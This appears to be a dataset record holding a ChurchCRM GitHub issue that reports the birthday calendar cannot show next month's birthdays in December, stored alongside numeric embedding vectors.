0.005120083689689636, 0.007022228091955185, -0.005751804914325476, 0.002441375982016325, 0.0018620073096826673, 0.005441179499030113, 0.0021988090593367815, 0.0029073141049593687, -0.0059193335473537445, -0.001048796926625073, 0.005779726430773735, -0.010261108167469501, -0.0032528412993997335, -0.010966123081743717, 0.004359226208180189, 0.0122505072504282, -0.007580655626952648, -0.008355474099516869, -0.01911218650639057, -0.03908993676304817, -0.006373055744916201, 0.0018550269305706024, 0.016752829775214195, 0.012187683954834938, -0.023132866248488426, 0.0035809173714369535, -0.0036611915566027164, 0.016068756580352783, 0.0019981239456683397, 0.02236502803862095, 0.024612700566649437, 0.02274196781218052, 0.009151233360171318, -0.01859564147889614, 0.0002720153424888849, 0.009549112990498543, 0.013911829330027103, -0.02122025191783905, -0.011259297840297222, 0.010624086484313011, -0.01697620190680027, -0.01137098390609026, 0.00717579573392868, -0.0048932223580777645, -0.002448356244713068, 0.015259035862982273, -0.024891912937164307, 0.012327291071414948, -0.005929803941398859, 0.000633466406725347, 0.0009144252981059253, -0.018023252487182617, -0.013709399849176407, -0.0009467094205319881, 0.02108064480125904, 0.010191305540502071, 0.024989638477563858, 0.009255939163267612, -0.00001840520963014569, -0.005650590173900127, 0.011894509196281433, -0.015887267887592316, -0.008118142373859882, 0.0012416290119290352, 0.00617760606110096, -0.0011910215253010392, -0.0031952534336596727, -0.012487838976085186, 0.009325741790235043, 0.022057892754673958, -0.0009152978891506791, 0.01371638011187315, -0.03099273517727852, 0.0045860870741307735, 0.006613877601921558, -0.00021366402506828308, -0.0025460810866206884, 0.011845647357404232, 0.011440787464380264, -0.02733503468334675, -0.012983443215489388, -0.013143991120159626, 0.013346421532332897, -0.019712496548891068, -0.008844098076224327, 0.011433806270360947, -0.00786685012280941, 0.014854175969958305, 0.012634426355361938, -0.0076295179314911366, 0.0005719520850107074, -0.016543420031666756, -0.001079336041584611, -0.012369172647595406, -0.011517571285367012, 0.010875378735363483, 0.01673886924982071, -0.027111664414405823, -0.00021977182768750936, -0.020592020824551582, 0.006257880013436079, 0.000979866017587483, -0.0018724778201431036, 0.01164321694523096, 0.006760464981198311, -0.009290840476751328, 0.0120271360501647, 0.016334010288119316, 0.03615819290280342, -0.001410902477800846, -0.010065658949315548, -0.018469994887709618, 0.0012782758567482233, -0.010533342137932777, 0.004928124137222767, -0.0016578321810811758, -0.0048792618326842785, 0.0075946166180074215, -0.005486552137881517, -0.0019108697306364775, -0.0036611915566027164, -0.008941823616623878, 0.006352114956825972, -0.0013227756135165691, -0.008348493836820126, -0.023593569174408913, 0.004826909396797419, 0.02466854266822338, -0.01852583885192871, 0.01915406994521618, -0.002458826871588826, 0.01897258125245571, -0.007699321489781141, 0.014065396972000599, -0.021862443536520004, 0.03129987046122551, -0.01673886924982071, -0.006826778408139944, -0.010924241505563259, 0.007378225680440664, -0.03610235080122948, -0.01922387257218361, 0.005486552137881517, 0.006854699924588203, -0.00504679000005126, 0.0068826209753751755, 0.029177846387028694, -0.02384486235678196, 0.011657177470624447, -0.006854699924588203, -0.006784896366298199, -0.011189494282007217, 0.025045480579137802, -0.03336605429649353, -0.00720371725037694, 0.004952555522322655, 0.014547040686011314, -0.021206291392445564, 0.000815827923361212, -0.004785027354955673, -0.0013637851225212216, -0.010344873182475567, -0.007147874217480421, 0.002202299190685153, -0.03467835858464241, 0.010798594914376736, 0.013876928016543388, -0.007734223268926144, 0.0007996858912520111, -0.0004061688669025898, 0.012173723429441452, -0.0024972187820822, -0.007252579554915428, -0.00990511104464531, 0.008669589646160603, 0.0040939729660749435, 0.0032615666277706623, -0.00797155499458313, 0.017450865358114243, -0.018651483580470085, -0.0037309948820620775, -0.025268852710723877, -0.0036507209297269583, -0.0021621622145175934, -0.005085181910544634, -0.0195310078561306, 0.007838928140699863, -0.01974041759967804, 0.008620726875960827, -0.00233318074606359, -0.003006784012541175, -0.00209584878757596, -0.014686647802591324, -0.002245926298201084, -0.022002050653100014, -0.0253944993019104, -0.00008692712435731664, 0.019866064190864563, -0.020829351618885994, 0.012431995943188667, -0.0011718255700543523, 0.00009674323518993333, 0.005842549726366997, -0.0013227756135165691, 0.01239011436700821, -0.010254127904772758, -0.005374866537749767, -0.025045480579137802, -0.008062299340963364, -0.009556093253195286, 0.020550139248371124, -0.006701132282614708, 0.003940405324101448, -0.010184324346482754, -0.002591453492641449, 0.0005235259304754436, -0.002528630429878831, 0.02794930525124073, 0.00929782073944807, 0.0018707327544689178, -0.015775581821799278, -0.008069279603660107, -0.009960954077541828, 0.020996879786252975, -0.029233688488602638, 0.020717667415738106, 0.013123050332069397, 0.030685601755976677, -0.004006718751043081, 0.015998952090740204, -0.0008197543793357909, -0.006893091835081577, -0.024975677952170372, 0.012753091752529144, -0.02191828563809395, 0.000055788234021747485, 0.012969482690095901, -0.01648757793009281, 0.01566389575600624, 0.020536178722977638, -0.02377505786716938, -0.014037475921213627, -0.02422180026769638, 0.02471042424440384, 0.015091507695615292, -0.011894509196281433, 0.016501538455486298, 0.003413389204069972, 0.001499029342085123, -0.008348493836820126, -0.006914032623171806, -0.014658726751804352, -0.009381584823131561, 0.011503609828650951, 0.007468970026820898, -0.00855790451169014, 0.01812097802758217, 0.015566171146929264, -0.041044432669878006, 0.009444408118724823, 0.016026875004172325, -0.0026403157971799374, -0.02398446947336197, 0.02356564812362194, 0.0005654080305248499, -0.02039657160639763, -0.024403288960456848, 0.004809458274394274, 0.0025670223403722048, -0.00700477696955204, -0.009032567963004112, 0.00510612316429615, -0.004778046626597643, -0.0015103723853826523, -0.006645289249718189, 0.007580655626952648, -0.008041358552873135, -0.011308160610496998, 0.01618044264614582, 0.0090953903272748, -0.013862967491149902, 0.0045860870741307735, 0.015789542347192764, 0.004568636417388916, -0.020173199474811554, -0.016417773440480232, 0.016962241381406784, 0.013779202476143837, 0.017087886109948158, 0.005081691779196262, -0.012445956468582153, 0.016334010288119316, 0.003933425061404705, 0.026525314897298813, 0.0016464891377836466, -0.0028322753496468067, 0.003608838887885213, -0.008683550171554089, -0.0016464891377836466, 0.011433806270360947, 0.007022228091955185, -0.02239294908940792, 0.0011055122595280409, 0.019405361264944077, -0.01266234740614891, -0.005706432741135359, -0.04344567283987999, -0.00438365712761879, -0.016710948199033737, -0.007804026827216148, 0.0025652770418673754, -0.009549112990498543, -0.018093056976795197, -0.0036193092819303274, 0.007545753847807646, -0.018902776762843132, 0.035906899720430374, -0.014016535133123398, 0.022239381447434425, -0.000019632223484222777, -0.004345265217125416, -0.023802978917956352, 0.01821870356798172, -0.0042370702140033245, 0.012836855836212635, -0.0278795026242733, 0.006387016735970974, 0.010945182293653488, -0.007838928140699863, 0.010051698423922062, 0.015398642979562283, -0.00017538119573146105, 0.00020243003382347524, 0.008955784142017365, 0.002654276555404067, 0.008879000321030617, -0.023830901831388474, -0.012096939608454704, 0.020996879786252975, -0.006596426945179701, -0.0007870339904911816, -0.026525314897298813, -0.021192330867052078, 0.010617106221616268, 0.022937417030334473, -0.0147843724116683, 0.021722836419939995, 0.013339441269636154, 0.0063974871300160885, -0.006079881452023983, -0.004973496310412884, -0.01732521876692772, -0.005385336931794882, 0.007650459185242653, -0.01625024527311325, 0.012892698869109154, -0.010854437947273254, -0.0012704229447990656, -0.0016011168481782079, 0.02349584363400936, -0.0033366053830832243, 0.021331937983632088, -0.003703073598444462, 0.006338153965771198, 0.0007010885165072978, -0.0050432998687028885, -0.015203193761408329, 0.02215561829507351, 0.012997403740882874, 0.005423728842288256, -0.04796893894672394, -0.007587635889649391, -0.010533342137932777, -0.008271710015833378, -0.008020417764782906, 0.016864515841007233, -0.027069780975580215, -0.022406909614801407, 0.004924634005874395, 0.0005466483416967094, 0.0033715071622282267, -0.009479309432208538, -0.0009659053757786751, 0.002320965053513646, -0.0195310078561306, -0.019265754148364067, 0.013646576553583145, -0.002978862728923559, 0.019852103665471077, 0.005661060567945242, -0.02691621333360672, -0.0034378203563392162, -0.011810745112597942, 0.003376742359250784, -0.009919071570038795, 0.0021255153696984053, -0.0181907806545496, -0.00929782073944807, 0.022337106987833977, -0.011706040240824223, 0.031523242592811584, -0.02473834529519081, -0.024891912937164307, 0.02197412960231304, -0.02595292590558529, -0.00841829739511013, 0.005964705720543861, -0.006505682598799467, -0.004223109222948551, -0.015035665594041348, 0.006578976288437843, 0.0038112688343971968, 0.0007996858912520111, 0.024752307683229446, -0.014533080160617828, -0.024138037115335464, 0.003839190350845456, 0.008941823616623878, 0.007378225680440664, -0.0026595117524266243, 0.0016543420497328043, 0.01000981591641903, -0.009940012358129025, -0.028926553204655647, -0.02084331214427948, 0.004477892071008682, 0.009646838530898094, 0.0005283249192871153, -0.012725170701742172, -0.00002121370744134765, -0.0022180050145834684, 0.0211225263774395, 0.008927862159907818, -0.00933272298425436, -0.01721353270113468, -0.009974914602935314, 0.01345810666680336, -0.005203847773373127, -0.023928625509142876, -0.018539799377322197, 0.00838339515030384, -0.02895447425544262, -0.011852627620100975, -0.011720000766217709, -0.007364265155047178, -0.007936653681099415, 0.0023000240325927734, -0.027307113632559776, 0.006010077893733978, -0.004324324429035187, -0.015231114812195301, 0.00015945728227961808, -0.0003991885459981859, -0.032863467931747437, -0.0021482014562934637, 0.0031306850723922253, -0.0183862317353487, 0.03950875997543335, -0.0034797023981809616, -0.0006016185507178307, 0.01622232422232628, 0.012913639657199383, -0.001034836284816265, -0.006596426945179701, -0.018302466720342636, 0.011224396526813507, 0.0016525968676432967, -0.02584123983979225, 0.008809196762740612, -0.0025652770418673754, -0.005699452478438616, -0.006753484718501568, -0.003319154493510723, 0.009374604560434818, 0.015580132603645325, -0.017660275101661682, -0.0021499465219676495, -0.012892698869109154, -0.008502061478793621, -0.010170363821089268, 0.005982156377285719, 0.006715092808008194, 0.0224627535790205, 0.00048164385952986777, 0.01335340179502964, -0.01746482588350773, -0.011845647357404232, 0.011754903011023998, -0.013611674308776855, -0.0447300560772419, -0.0001730907679302618, 0.04012302681803703, -0.015761621296405792, -0.000012829112165491097, -0.006146194413304329, -0.009493270888924599, -0.003231900278478861, 0.024891912937164307, 0.01625024527311325, 0.009695700369775295, -0.01566389575600624, 0.01435159146785736, -0.0025931985583156347, -0.00557380635291338, 0.007650459185242653, 0.00921405665576458, -0.003933425061404705, -0.004704753402620554, -0.00331217423081398, -0.010414675809442997, 0.0076295179314911366, 0.006948934402316809, 0.0013655301881954074, -0.006299762055277824, 0.004823419265449047, -0.0120271360501647, 0.02302118018269539, -0.0023070042952895164, -0.007468970026820898, -0.0055214534513652325, -0.01537072192877531, 0.0028078441973775625, 0.0019353008829057217, 0.007873830385506153, -0.0030155093409121037, 0.012271448038518429, -0.004456950817257166, 0.006495211739093065, -0.014812294393777847, 0.020298846065998077, 0.019503086805343628, -0.007060620002448559, 0.008872020058333874, 0.005420238710939884, 0.006209017708897591, -0.008160024881362915, 0.01580350287258625, 0.01302532572299242, 0.012746111489832401, -0.0016150774899870157, 0.007720262743532658, 0.028005147352814674, 0.00003792836287175305, 0.021485505625605583, -0.012655367143452168, -0.006837248802185059, -0.01697620190680027, 0.006118273362517357, 0.012243526987731457, -0.009416487067937851, -0.02398446947336197, -0.00843923818320036, -0.012543682008981705, 0.008446218445897102, 0.014274807646870613, -0.0009807385504245758, 0.022755928337574005, -0.015077547170221806, 0.012327291071414948, -0.035208866000175476, -0.00020864690304733813, -0.0005357415648177266, 0.018581680953502655, -0.002624609973281622, 0.016208363696932793, 0.0020033593755215406, -0.0068826209753751755, -0.009081429801881313, -0.007999476045370102, 0.0008769059786573052, 0.01559409312903881, 0.016068756580352783, 0.01440743450075388, 0.015231114812195301, 0.011343061923980713, 0.022127697244286537, 0.012822895310819149, 0.01652945950627327, -0.01911218650639057, 0.013946731574833393, 0.012278428301215172, 0.002062692306935787, -0.010693890042603016, 0.01711580902338028, 0.018791090697050095, 0.007657439447939396, 0.0014449316076934338, -0.02767009101808071, 0.0015548720257356763, -0.005154985468834639, -0.002134240698069334, -0.02187640406191349, 0.020061513409018517, -0.019475165754556656, 0.005524944048374891, 0.013116070069372654, 0.011657177470624447, -0.020647862926125526, 0.02056409977376461, -0.005441179499030113, 0.007036188617348671, 0.002153436653316021, -0.018609602004289627, 0.010149423032999039, 0.006509172730147839, 0.005437689367681742, 0.020815391093492508, -0.010631066747009754, 0.006086861714720726, -0.009374604560434818, 0.004627969581633806, -0.024542896077036858, 0.009828327223658562, 0.013625635765492916, 0.0032737823203206062, -0.003964836709201336, -0.00022446174989454448, -0.02822851948440075, -0.019056344404816628, -0.005116593558341265, -0.007936653681099415, -0.032528411597013474, 0.011105730198323727, 0.012529720552265644, -0.004181227181106806, -0.00888598058372736, -0.01145474798977375, -0.01347206812351942, 0.01812097802758217, 0.009388565085828304, 0.01604083552956581, 0.004474401939660311, -0.01960081234574318, 0.005109613295644522, -0.002144711324945092, 0.0005134916864335537, 0.009060489013791084, -0.023802978917956352, -0.0035739371087402105, 0.00040704142884351313, -0.00540976831689477, -0.013402264565229416, 0.005165455862879753, 0.0011587374610826373, -0.0020173199009150267, -0.010051698423922062, 0.02108064480125904, 0.0009693955653347075, -0.017646314576268196, 0.020717667415738106, -0.012292388826608658, -0.017674235627055168, -0.011608315631747246, 0.0323050394654274, -0.0024692974984645844, 0.03233296424150467, -0.005807647947221994, 0.008983705192804337, -0.0015662150690332055, 0.003546015825122595, 0.007692341227084398, 0.010379774495959282, -0.0047291843220591545, 0.017674235627055168, 0.006338153965771198, -0.013297558762133121, -0.011531531810760498, 0.013967672362923622, -0.015203193761408329, -0.015356761403381824, -0.014163121581077576, 0.012452937662601471, 0.03599066287279129, -0.0025129246059805155, 0.010854437947273254, -0.01880505122244358, 0.012418035417795181, 0.007475950755178928, 0.02288157492876053, 0.014107279479503632, -0.009604956023395061, 0.012383134104311466, -0.0032598215620964766, 0.0001687280455371365, -0.0097655039280653, 0.017408981919288635, 0.0012660602806136012, 0.016920357942581177, 0.03423161804676056, -0.004498832859098911, -0.0020574568770825863, 0.03071352280676365, 0.0020033593755215406, 0.03512509912252426, 0.008453198708593845, 0.013297558762133121, 0.007776105310767889, -0.023481883108615875, -0.006369565613567829, -0.019070304930210114, -0.007161834742873907, -0.007678380701690912, 0.012404074892401695, -0.021694915369153023, 0.04461837187409401, 0.0004340902669355273, -0.015552210621535778, 0.024514975026249886, 0.01155945286154747, 0.004990947432816029, 0.0015662150690332055, 0.003821739461272955, -0.013157952576875687, -0.02001963183283806, 0.014965862035751343, -0.027139585465192795, 0.0047710663639009, -0.0027711973525583744, -0.010114521719515324, -0.004481382202357054, 0.006798856891691685, 0.0008594550890848041, 0.0069803460501134396, 0.010610125958919525, -0.017059965059161186, -0.004034639801830053, 0.009234997443854809, 0.006062430329620838, -0.014002573676407337, -0.01067992951720953, 0.00023013328609522432, 0.007859869860112667, 0.008285670541226864, 0.022825730964541435, 0.002139476127922535, 0.00007416617881972343, 0.003163841785863042, -0.018888816237449646, 0.014260847121477127, -0.019475165754556656, 0.012850817292928696, 0.00413934513926506, 0.0038706017658114433, 0.00195798696950078, 0.009179155342280865, 0.0017555570229887962, 0.012124860659241676, -0.004966516047716141, -0.006439369171857834, 0.004463931079953909, -0.022476714104413986, -0.00720371725037694, -0.011084789410233498, -0.0033907031174749136, -0.004641930107027292, -0.00003242043385398574, 0.014519119635224342, -0.008208886720240116, -0.005472591146826744, -0.008830137550830841, -0.03236088529229164, -0.016236284747719765, 0.007071090396493673, -0.012920619919896126, -0.008502061478793621, -0.007678380701690912, 0.02912200428545475, 0.021457582712173462, 0.015398642979562283, -0.012117880396544933, 0.021988090127706528, 0.0050502801313996315, -0.023160787299275398, -0.0013262657448649406, -0.005071221385151148, -0.01000981591641903, -0.022714044898748398, -0.021345898509025574, -0.008788255974650383, -0.018107017502188683, 0.011001025326550007, 0.019921908155083656, 0.017101848497986794, 0.03733089193701744, -0.0030451759230345488, -0.013786183670163155, 0.009772484190762043, -0.0017607922200113535, -0.026441549882292747, 0.018609602004289627, -0.006938464008271694, -0.005535414442420006, -0.006662740372121334, -0.002341906074434519, 0.013988613151013851, 0.0023314354475587606, -0.005242239683866501, -0.003217939520254731, 0.008139083161950111, 0.01324869692325592, 0.0015574897406622767, -0.016124598681926727, 0.018553759902715683, 0.03654909133911133, -0.003101018723100424, 0.0011508845491334796, -0.009674759581685066, -0.02056409977376461, -0.012397094629704952, -0.00038719107396900654, -0.02159718982875347, -0.009123312309384346, -0.014435355551540852, -0.019070304930210114, 0.022057892754673958, -0.007448029238730669, -0.0058285887353122234, 0.020103396847844124, 0.015035665594041348, -0.00957703497260809, -0.00968173984438181, -0.018176820129156113, 0.014533080160617828, 0.004463931079953909, 0.01023318711668253, 0.021750757470726967, 0.00376589666120708, -0.002999803749844432, 0.0065405843779444695, -0.010700870305299759, -0.013109089806675911, 0.004202168434858322, 0.008592805825173855, -0.03219335526227951, -0.013876928016543388, -0.021415701135993004, -0.019447244703769684, -0.007908731698989868, -0.0018480465514585376, 0.0065405843779444695, 0.006809327285736799, -0.010156403295695782, -0.00008327334944624454, 0.0076015968807041645, -0.030797285959124565, -0.026204219087958336, -0.009981894865632057, -0.005727373994886875, 0.011810745112597942, -0.008592805825173855, -0.00455467589199543, 0.004798987880349159, -0.008704490959644318, -0.0013594223419204354, -0.001004297286272049, 0.008920881897211075, 0.005755295045673847, 0.008243788965046406, -0.0008507296442985535, 0.0005767510738223791, 0.007095521781593561, -0.009165193885564804, -0.014435355551540852, -0.017367100343108177, -0.013486028648912907, -0.012243526987731457, -0.0004807713266927749, -0.02591104432940483, 0.0011884039267897606, 0.02339811995625496, 0.022560477256774902, 0.019754379987716675, -0.0025582967791706324, 0.0030207447707653046, -0.004202168434858322, 0.008097201585769653, -0.001048796926625073, -0.006271841004490852, 0.004118404351174831, 0.004216128960251808, 0.02394258603453636, -0.022755928337574005, 0.00827869027853012, -0.006631328724324703, -0.005811138078570366, 0.01261348556727171, -0.0037973083090037107, -0.012669327668845654, -0.013688458129763603, -0.006523133255541325, -0.006701132282614708, 0.015984991565346718, 0.006439369171857834, 0.010805575177073479, -0.0023994939401745796, 0.010721811093389988, -0.0048932223580777645, -0.030210936442017555, -0.01856772042810917, -0.01123137678951025, 0.012850817292928696, 0.00419169757515192, 0.00039438955718651414, -0.005936784204095602, 0.024863991886377335, 0.01756254956126213, 0.0224627535790205, 0.0006064175395295024, -0.016431733965873718, -0.002294788835570216, 0.00957703497260809, 0.0020243003964424133, -0.009151233360171318, 0.003032960230484605, -0.016641145572066307, 0.018902776762843132, 0.0029526862781494856, 0.009842287749052048, 0.011929411441087723, 0.004181227181106806, 0.0007412254926748574, -0.013143991120159626, 0.02757236734032631, 0.004617498721927404, 0.01983814314007759, 0.001914359861984849, -0.014854175969958305, -0.0029840979259461164, 0.00952119193971157, -0.00416726665571332, -0.01594310998916626, -0.00004572671969071962, 0.020731627941131592, -0.013772222213447094, 0.018763169646263123, 0.0159012284129858, 0.0015871562063694, 0.0031603516545146704, 0.037219204008579254, 0.005905372556298971, -0.008048338815569878, -0.003043430857360363, 0.02464062161743641, -0.010030756704509258, 0.019447244703769684, -0.0024274152237921953, 0.003142900764942169, 0.0063905068673193455, 0.0023436511401087046, 0.006502192467451096, -0.002310494426637888, 0.018442073836922646, -0.005130554083734751, -0.013276617974042892, 0.006903562229126692, 0.020075475797057152, 0.024975677952170372, 0.03571144863963127, 0.011105730198323727, -0.009088410064578056, 0.01587330736219883, 0.01714373007416725, -0.0031987435650080442, 0.008781274780631065, -0.0211225263774395, 0.005242239683866501, 0.01012848224490881, -0.030238859355449677, 0.009556093253195286, 0.004568636417388916, 0.0059402743354439735, -0.01604083552956581, 0.024165958166122437, 0.015272997319698334, -0.0007429705583490431, 0.004990947432816029, -0.008711472153663635, -0.0018183800857514143, 0.009067469276487827, 0.022923456504940987, 0.008676569908857346, 0.006530113518238068, -0.007350304163992405, 0.001706694602034986, 0.004676831886172295, 0.005441179499030113, 0.0006269222940318286, 0.00893484242260456, -0.007273520343005657, 0.011482669040560722, 0.0001641472044866532, -0.006243919488042593, -0.008732412941753864, 0.011908470652997494, -0.01601291447877884, -0.015677856281399727, 0.016864515841007233, -0.010030756704509258, -0.018832974135875702, -0.0024204349610954523, -0.016515498980879784, -0.037693869322538376, 0.005312043242156506, 0.0035739371087402105, 0.0060763913206756115, -0.013918809592723846, 0.0007831075345166028, 0.0068756407126784325, 0.00033331153099425137, -0.028144754469394684, -0.01777196116745472, -0.0010566498385742307, -0.0020504766143858433, -0.017311258241534233, 0.0006343389395624399, 0.024514975026249886, -0.0034046636428683996, -0.016278166323900223, -0.020298846065998077, 0.027725934982299805, -0.01936347968876362, 0.0318024568259716, 0.02304910309612751, -0.009632877074182034, 0.02105272375047207, 0.010079619474709034, -0.004956045653671026, 0.007123442832380533, -0.0017241454916074872, 0.00015356761286966503, 0.004202168434858322, 0.01321379467844963, -0.01873524859547615, -0.007811007089912891, -0.0005335601745173335, 0.026902252808213234, 0.01960081234574318, -0.012725170701742172, -0.01484021544456482, 0.012899679131805897, 0.00587396090850234, -0.01870732754468918, -0.008920881897211075, 0.009444408118724823, 0.008390375413000584, 0.013814104720950127, 0.013178893364965916, -0.024096153676509857, -0.002666492247954011, -0.021345898509025574, -0.0068616801872849464, -0.0009685229742899537, 0.0043103634379804134, -0.03948083519935608, -0.003031215164810419, 0.014100299216806889, 0.023886743932962418, 0.004997927695512772, 0.014463276602327824, 0.005479571409523487, -0.02060598134994507, 0.008369434624910355, 0.016571341082453728, 0.000959797587711364, -0.007943633943796158, -0.0019719477277249098, -0.0059332940727472305, -0.00419169757515192, 0.0031167245469987392, 0.018986541777849197, 0.0017677725991234183, 0.00397530710324645, 0.00827869027853012, -0.008690530434250832, 0.007552734110504389, -0.002943960949778557, -0.016543420031666756, 0.005116593558341265, -0.032528411597013474, -0.023830901831388474, 0.01835831068456173, -0.007838928140699863, 0.013465086929500103, -0.0064114476554095745, 0.0023733177222311497, 0.018330387771129608, -0.027586327865719795, -0.007776105310767889, 0.00841829739511013, -0.007245599292218685, 0.012383134104311466, -0.02581331878900528, 0.006327683571726084, -0.018553759902715683, -0.025199048221111298, 0.044813819229602814, -0.019126147031784058, 0.01777196116745472, 0.01243897620588541, 0.003477957332506776, -0.010205266065895557, -0.004114913754165173, -0.007455009501427412, -0.003933425061404705, 0.0004321270389482379, -0.02881486900150776, 0.014086337760090828, -0.007427087984979153, -0.00266125681810081, 0.015272997319698334, 0.010365813970565796, 0.007224658038467169, -0.001229413435794413, -0.005996117368340492, -0.029792116954922676, -0.009137272834777832, 0.0007612939807586372, 0.012236546725034714, -0.024319525808095932, 0.005758785642683506, -0.010449578054249287, -0.01200619526207447, -0.01732521876692772, -0.006959404796361923, -0.012955522164702415, 0.012013175524771214, 0.005748314782977104, -0.022560477256774902, -0.016026875004172325, -0.01414916105568409, -0.004523264244198799, -0.0032964684069156647, 0.010309970937669277, -0.0020051044411957264, -0.023733176290988922, -0.012774033471941948, -0.014274807646870613, -0.022281264886260033, 0.0018846933962777257, 0.012739131227135658, 0.0213179774582386, -0.005870470777153969, 0.01492397952824831, 0.020592020824551582, -0.004240560345351696, 0.010707850567996502, -0.02283969148993492, 0.030518071725964546, -0.001374255632981658, 0.004135855007916689, 0.012459917925298214, 0.004059071186929941, -0.036939989775419235, -0.016962241381406784, -0.00855790451169014, -0.0010610126191750169, -0.022686123847961426, -0.005695962347090244, 0.013814104720950127, -0.023370198905467987, -0.004369696602225304, 0.013835045509040356, 0.02794930525124073, 0.0007447156822308898, 0.011280238628387451, -0.003451781114563346, -0.020298846065998077, -0.006275331135839224, -0.022057892754673958, -0.0020120847038924694, 0.0052003576420247555, -0.012425015680491924, -0.023035142570734024, -0.010149423032999039, -0.018763169646263123, -0.004596557933837175, -0.01335340179502964, 0.01393975131213665, -0.012480858713388443, -0.018274545669555664, -0.020270925015211105, 0.02660907804965973, -0.01537072192877531, 0.00011692079715430737, 0.027237309142947197, 0.015356761403381824, 0.006282311398535967, -0.013178893364965916, -0.015189233236014843, 0.0076225376687943935, 0.017367100343108177, -0.010749733075499535, 0.008104181848466396, -0.0029160394333302975, 0.024542896077036858, 0.010700870305299759, 0.018274545669555664, -0.01925179362297058, 0.011552472598850727, -0.014100299216806889, 0.0038706017658114433, 0.020801430568099022, -0.00695242453366518, 0.0021761227399110794, -0.02115044742822647, -0.0057901968248188496, 0.0023244551848620176, 0.0020312806591391563, -0.0057692560367286205, 0.010854437947273254, 0.010470518842339516, -0.009311781264841557, 0.012808934785425663, -0.002598433755338192, 0.009940012358129025, -0.00902558770030737, -0.0036437406670302153, 0.03624195605516434, -0.025450341403484344, -0.0002990642096847296, -0.020075475797057152, 0.005811138078570366, -0.0000432999586337246, 0.004359226208180189, 0.02536657638847828, -0.007936653681099415, -0.006160155404359102, 0.0017799881752580404, 0.006250899750739336, 0.011964312754571438, 0.014421395026147366, 0.0032964684069156647, 0.018958618864417076, 0.008160024881362915, 0.009465348906815052, -0.002409964334219694, 0.03878280147910118, 0.0038252295926213264, -0.005221298895776272, -0.006044979672878981, 0.003107998985797167, -0.015175271779298782, -0.006694151554256678, 0.003292978275567293, -0.03881072252988815, 0.0245010145008564, 0.009018607437610626, 0.012299370020627975, -0.005308553110808134, -0.004376676864922047, 0.00935366377234459, -0.021443622186779976, -0.0019300656858831644, -0.029931724071502686, -0.0067255632020533085, -0.0027153545524924994, 0.0070257182233035564, 0.008481120690703392, 0.0076015968807041645, -0.010610125958919525, 0.017827803269028664, -0.0018044194439426064, -0.01625024527311325, 0.016026875004172325, -0.009102371521294117, -0.0047152237966656685, 0.007140893954783678, 0.008460178971290588, -0.023370198905467987, 0.012871758081018925, 0.011566433124244213, 0.008397356607019901, -0.00306262681260705, 0.004952555522322655, -0.004778046626597643, 0.009695700369775295, 0.0024762777611613274, -0.011671137996017933, 0.00907444953918457, 0.02297929860651493, -0.005510983057320118, -0.007385205943137407, -0.002504199044778943, 0.003031215164810419, -0.0014178827404975891, -0.01800929196178913, -0.0124738784506917, 0.017548589035868645, 0.002793883439153433, -0.016417773440480232, 0.01304626651108265, -0.0014205004554241896, -0.003265056759119034, 0.011377964168787003, -0.000037601159419864416, 0.016920357942581177, -0.015831423923373222, -0.011636236682534218, 0.009514211677014828 ]
null
null
null
null
null
null
null
null
null
[ "ChurchCRM", "CRM" ]
Usually, it is OK. But, I cannot check birthdays of next month in December. <img width="1674" alt="Screenshot 2024-05-04 at 9 24 32 AM" src="https://github.com/ChurchCRM/CRM/assets/40956907/dadccf94-006b-4fd5-b2f9-5d85be6a48a2">
Bug: Birthday Calendar works for only current year.
https://api.github.com/repos/ChurchCRM/CRM/issues/6991/comments
0
2024-05-04T17:18:51
2024-05-04T19:06:55Z
https://github.com/ChurchCRM/CRM/issues/6991
2,279,121,609
6,991
false
This is a GitHub Issue repo:CRM owner:ChurchCRM Title : Bug: Birthday Calendar works for only current year. Issue date: --- start body --- Usually, it is OK. But, I cannot check birthdays of next month in December. <img width="1674" alt="Screenshot 2024-05-04 at 9 24 32 AM" src="https://github.com/ChurchCRM/CRM/assets/40956907/dadccf94-006b-4fd5-b2f9-5d85be6a48a2"> --- end body ---
391
[ -0.02111886814236641, 0.009687268175184727, -0.004462061449885368, 0.04102293401956558, 0.030961880460381508, 0.016150638461112976, -0.016586720943450928, 0.05451035127043724, -0.0011135685490444303, 0.01898517645895481, 0.021477079018950462, -0.003200536360964179, -0.028049468994140625, -0.0005670050159096718, -0.011244706809520721, 0.014141542837023735, -0.048560936003923416, 0.005735267885029316, 0.017661353573203087, -0.01285665575414896, -0.04747072979807854, 0.0095081627368927, 0.015013707801699638, 0.02773798070847988, -0.022411542013287544, 0.018891729414463043, 0.005501651670783758, -0.016259659081697464, -0.009554886259138584, 0.008783954195678234, 0.00696953758597374, 0.03460628539323807, 0.008176553063094616, 0.019670449197292328, 0.05133317783474922, 0.003613257547840476, 0.022800901904702187, 0.03996387496590614, -0.010652880184352398, 0.013767757453024387, -0.023859959095716476, -0.0030292181763798, -0.024420637637376785, 0.025869054719805717, -0.0062803709879517555, 0.01594817079603672, -0.014772305265069008, -0.008589274249970913, -0.030634816735982895, 0.03902941197156906, -0.010684029199182987, 0.0039130644872784615, 0.008659359067678452, 0.008986420929431915, 0.003786522662267089, -0.05030526593327522, 0.04373287782073021, -0.004458168055862188, -0.03242587298154831, 0.01027909480035305, -0.010442625731229782, 0.001024015829898417, 0.04027536138892174, 0.016384253278374672, 0.042891860008239746, 0.04476078599691391, -0.05298406258225441, 0.025837905704975128, 0.00461780559271574, 0.029077379032969475, 0.016680167987942696, -0.02984052337706089, 0.006369923707097769, 0.014756730757653713, 0.03195863962173462, -0.034201350063085556, 0.012482870370149612, 0.047657620161771774, -0.051613517105579376, -0.009220036678016186, -0.02938886731863022, 0.027504365891218185, -0.0402442142367363, 0.000311974436044693, 0.028018319979310036, 0.006404966115951538, 0.018393350765109062, -0.07699976116418839, -0.024000128731131554, -0.020418019965291023, 0.011003303341567516, -0.002871527336537838, -0.02884376235306263, -0.024046851322054863, 0.01850237138569355, 0.005797565449029207, 0.028656870126724243, 0.023361578583717346, -0.044978827238082886, -0.03088400699198246, 0.002497742185369134, -0.04821829870343208, -0.014491965994238853, -0.016835911199450493, 0.02974707819521427, -0.00819991435855627, -0.0029688673093914986, -0.055320218205451965, 0.0011233026161789894, 0.05765637755393982, 0.02009095810353756, -0.0042440202087163925, -0.0381883941590786, -0.026102671399712563, -0.03563419356942177, 0.05675306171178818, 0.005365375895053148, 0.01797284185886383, -0.005299184937030077, 0.016804762184619904, -0.00928233377635479, -0.030136436223983765, 0.032768506556749344, -0.03547845035791397, -0.017910543829202652, 0.01544200349599123, 0.026523180305957794, -0.012420573271811008, -0.024264894425868988, -0.030261032283306122, 